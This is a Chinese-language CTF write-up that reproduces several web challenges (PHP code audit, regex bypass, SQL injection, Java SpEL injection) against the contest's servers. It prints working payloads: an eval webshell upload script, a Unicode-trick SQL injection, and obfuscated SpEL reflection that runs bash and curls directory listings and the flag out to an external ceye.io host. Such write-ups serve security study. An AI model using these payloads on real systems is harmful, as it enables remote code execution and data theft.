前言
这个是知识星球里面的一个比赛,一开始的时候事情多,没及时做,最近刷ph牛的文章看到这个比赛,找来复现一下
function
题目
function这题是一个php代码审计题,题目很短
<? php $action = $_GET [ 'action' ] ?? '' ; $arg = $_GET [ 'arg' ] ?? '' ; if ( preg_match ( '/^[a-z0-9_]*$/isD' , $action )) { show_source ( __FILE__ ); } else { $action ( '' , $arg ); }
可以看到,题目想要我们输入两个参数绕过正则,然后就可以执行任意命令了
题解
寻找可利用字符
我们先审计源码,可以看到如果传过来action和arg那就分别赋值,然后对action进行正则表达式过滤
/^[a-z0 -9 _]*$/ isD / i 忽略大小写 / s 匹配任何不可见字符 / D 如果正则表达式用 $ 限制结尾字符,则不允许结尾有换行
所以我们现在就要找一个开头不是字母数字和下划线的值,同时还要可以正常地执行函数
import requests for i in range ( 0 , 256 ): s = hex ( i )[ 2 :] if len ( s )< 2 : s = '%0' + s else : s = '%' + s url = 'http://xiaorouji.cn:8087/?action=' + s + 'var_dump&arg=find' r = requests . get ( url = url ). content if 'find' in r : print s
跑出来%5c可以成功绕过,原因p神在小密圈说了
php 里默认命名空间是 \, 所有原生函数和类都在这个命名空间中。普通调用一个函数,如果直接写函数名 function_name ()调用,调用的时候其实相当于写了一个相对路径;而如果写 \function_name () 这样调用函数,则其实是写了一个绝对路径。 如果你在其他 namespace 里调用系统类,就必须写绝对路径这种写法。
寻找getshell函数
接下来的利用我们就要用到create_function函数了
create_function ( string $args , string $code ) : string
这个函数由两个参数组成,第一个是函数名,第二个是函数内的代码。官方例子如下
$newfunc = create_function ( '$a,$b' , 'return "ln($a) + ln($b) = " . log($a * $b);' ); 实际上也就是 function test ( $a , $b ) { return "ln($a) + ln($b) = " . log ( $a * $b ); }
也可以简单理解成
create_function ( $_GET [ 'args' ], $_GET [ 'code' ]); $a = 'function __lambda_func(' . $_GET [ 'args' ]. '){' . $_GET [ 'code' ]. '}\0' ; eval ( $a );
顺便看一下create_function的源码也可以看到第一个参数是用(闭合的,第二个是用{闭合的
getflag
剩下的就是闭合以及利用了,尝试一下能不能得到phpinfo
parewaf
这个题目依旧很短,考的是php的正则特性
题目
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
<? php function is_php ( $data ) { return preg_match ( '/<\?.*[(`; ?> ].*/is' , $data); } if ( empty ($_FILES)) { die (show_source( __FILE__ )); } $user_dir = 'data/' . md5($_SERVER[ 'REMOTE_ADDR' ]); $data = file_get_contents($_FILES[ 'file' ][ 'tmp_name' ]); if (is_php($data)) { echo "bad request" ; } else { @mkdir($user_dir, 0755 ); $path = $user_dir . '/' . random_int( 0 , 10 ) . '.php' ; move_uploaded_file($_FILES[ 'file' ][ 'tmp_name' ], $path); header( "Location: $path" , true , 303 ); }
可以看到,这是一个上传文件的代码bad request,否则就新建一个路径为data/md5($_SERVER['REMOTE_ADDR']),然后将文件命名为randon_int(0,10).php存储在新建的文件夹里面,最后将存储路径在http头里面返回过来
题解
分析正则
首先我们先看一下他的正则表达式
的匹配过程<?,接下来的.*将所有都匹配了,然后还需要匹配就要回溯回去前面,因此一直回溯到前面的>完成符号匹配,然后从该点开始向后进行匹配,完成最后的.*匹配
payload
既然已经知道要怎么绕过漏洞点了,接下来就是写payload了
import requests from io import BytesIO file = { 'file' : BytesIO ( '<?php eval($_POST["cmd"]);//' + 'a' * 1000010 ) } res = requests . post ( 'http://xiaorouji.cn:8088/' , files = file , allow_redirects = False ) print res . headers [ 'Location' ]
拿到了shell文件目录以后就是利用了
phpmagic
这个题目让人感觉略为懵逼,但是找到源码就做起来舒服了
题目
源码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
if ( isset ( $_GET [ 'read-source' ])) { exit ( show_source ( __FILE__ )); } define ( 'DATA_DIR' , dirname ( __FILE__ ) . '/data/' . md5 ( $_SERVER [ 'REMOTE_ADDR' ])); if (! is_dir ( DATA_DIR )) { mkdir ( DATA_DIR , 0755 , true ); } chdir ( DATA_DIR ); $domain = isset ( $_POST [ 'domain' ]) ? $_POST [ 'domain' ] : '' ; $log_name = isset ( $_POST [ 'log' ]) ? $_POST [ 'log' ] : date ( '-Y-m-d' ); if (! empty ( $_POST ) && $domain ): $command = sprintf ( "dig -t A -q %s" , escapeshellarg ( $domain )); $output = shell_exec ( $command ); $output = htmlspecialchars ( $output , ENT_HTML401 | ENT_QUOTES ); $log_name = $_SERVER [ 'SERVER_NAME' ] . $log_name ; if (! in_array ( pathinfo ( $log_name , PATHINFO_EXTENSION ), [ 'php' , 'php3' , 'php4' , 'php5' , 'phtml' , 'pht' ], true )) { file_put_contents ( $log_name , $output ); } echo $output ; endif ;
题解
审计源码可以看到,文件名和文件内容我们都是可以知道的,但是文件内容会经过htmlspecialchars,所以想直接传个小马是8可能的,但是php有一个特性,只要能进行文件传输的地方,基本是都是能进行协议流的传输的,我们先本地尝试一波$_SERVER['SERVER_NAME'],同时后缀几乎全部过滤了,还有就是文件内容也不是完全可控的$_SERVER['SERVER_NAME'],我们可以通过修改Host的值达到控制的目的黑魔法 ,所以我们只要在文件名后面加个\.就可以绕过限制了ltltgtgtDiG9959deb8u15DebianltltgtgttAq刚好40位,4的倍数,所以直接加文件内容就行啦
phplimit
这道题目很短,满足了正则就能执行任意命令了
题目
<? php if ( ';' === preg_replace ( '/[^\W]+\((?R)?\)/' , '' , $_GET [ 'code' ])) { eval ( $_GET [ 'code' ]); } else { show_source ( __FILE__ ); }
题解
从正则表达式可以看到它会匹配字母和括号,接下来找一找能绕过的方法session_id,用来设置或者获取当前会话的id,对应PHPSESSID的值session_start,用来创建新的会话或者重用现有会话session_id(session_start()),但是PHPSESSID只允许字母数字和下划线,所以要将字符换下编码
readfile ( next ( array_reverse ( scandir ( dirname ( chdir ( dirname ( getcwd ())))))));
巨强
nodechr
一进去就是一大堆代码……
题目
首先审计源码可以看到题目将flag放进去数据库,然后让用户登录进去,先贴一波关键源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
function safeKeyword ( keyword ) { if ( isString ( keyword ) && ! keyword . match ( /(union|select|;|\-\-)/ i s )) { return keyword } return undefined } async function login ( ctx , next ) { if ( ctx . method == 'POST' ) { let username = safeKeyword ( ctx . request . body [ 'username' ]) let password = safeKeyword ( ctx . request . body [ 'password' ]) let jump = ctx . router . url ( 'login' ) if ( username && password ) { let user = await ctx . db . get ( `SELECT * FROM "users" WHERE "username" = ' ${username.toUpperCase()} ' AND "password" = ' ${password.toUpperCase()} '` ) if ( user ) { ctx . session . user = user jump = ctx . router . url ( 'admin' ) } } ctx . status = 303 ctx . redirect ( jump ) } else { await ctx . render ( 'index' ) } }
可以看到他将union和select那些过滤了,所以想直接读flag有点难,但是我们可以看到有个toUpperCase函数,看下ph牛的这篇文章 ,因此我们可以利用这些字符写payload
import requests , base64 url = "http://xiaorouji.cn:8085/login" data = { "username" : "admin" , "password" : "0' unıon ſelect 1,flag,3 from flags where '1'='1" } res = requests . post ( url , data = data ). content print res
Javacon
这题我们首先可以拿到一个jar包,然后用idea反编译出来可以看到一堆的java代码,肉鸡枯了…….admin/admin是可以登录进网站的MainController文件,这里只放重点函数FORBIDDEN,否则就继续下面的语句,在SmallEvaluationContext中进行SPEL解析,又因为有黑名单java.+lang,Runtime,exec.*\(,所以最后的利用字符串拼接和反射构造pop链
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
package com . company ; import javax . crypto . spec . IvParameterSpec ; import java . util . Base64 ; import javax . crypto . Cipher ; import javax . crypto . spec . SecretKeySpec ; import org . slf4j . LoggerFactory ; class Encryptor { static org . slf4j . Logger logger = LoggerFactory . getLogger ( Encryptor . class ); public static String encrypt ( String key , String initVector , String value ) { try { IvParameterSpec iv = new IvParameterSpec ( initVector . getBytes ( "UTF-8" )); SecretKeySpec skeySpec = new SecretKeySpec ( key . getBytes ( "UTF-8" ), "AES" ); Cipher cipher = Cipher . getInstance ( "AES/CBC/PKCS5PADDING" ); cipher . init ( 1 , skeySpec , iv ); byte [] encrypted = cipher . doFinal ( value . getBytes ()); return Base64 . getUrlEncoder (). encodeToString ( encrypted ); } catch ( Exception e ){ logger . warn ( e . getMessage ()); } return null ; } } public class Main { public static void main ( String [] args ) { System . out . println ( Encryptor . encrypt ( "c0dehack1nghere1" , "0123456789abcdef" , "#{T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',T(String[])).invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime')), new String[]{'/bin/bash','-c','curl http://abcdef.ceye.io/`cd / && ls|base64|tr \"\n\" \"-\"`'})}" )); System . out . println ( Encryptor . encrypt ( "c0dehack1nghere1" , "0123456789abcdef" , "#{T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',T(String[])).invoke(T(String).getClass().forName('java.l'+'ang.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(T(String).getClass().forName('java.l'+'ang.Ru'+'ntime')),new String[]{'/bin/bash','-c','curl http://abcdef.ceye.io/`cat flag_j4v4_chun|base64`'})}" )); } }
读目录
评论